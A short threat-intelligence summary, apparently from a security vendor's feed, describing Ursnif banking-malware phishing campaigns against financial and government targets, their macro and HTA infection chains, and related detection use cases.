2022-05-18

Ursnif Phishing Campaigns

Level: 
Tactical
  |  Source: 
Qualys
Financial
Government
Share:

Ursnif Phishing Campaigns

Industry: Financial, Government | Level: Tactical | Source: Qualys

Analysis of banking malware, Ursnif has been reviewed by Qualys. The information-stealing malware, with capabilities to steal credentials, keylogging, and download additional payloads, has been a prevalent threat since 2020. Ursnif is predominantly distributed through phishing emails targeting verticles in banking, financial services, and government agencies. In the latest stream of phishing campaigns, attackers are leveraging current events and impersonating government authorities to lure victims. Malicious attachments for the email either contain an Excel document or a zip attachment, the infection chain for both scenarios is slightly different, but the result is the same. In the Excel infection scenario, a binary is downloaded upon execution of the Excel macro. The binary spoofs the parent PID to explorer.exe for defense evasion. In the zip attachment scenario, an HTA file is attached and when triggered launched PowerShell to download a DLL file to be executed with rundll32.

Anvilogic Scenario:

  • Malicious Document Delivering Malware

Anvilogic Use Cases:

  • Malicious Document Execution
  • Compressed File Execution
  • Invoke-Expression Command
  • MSHTA.exe execution
  • Query Registry
  • Rundll32 Command Line

Chat with our team to receive a free maturity assessment

Get in Touch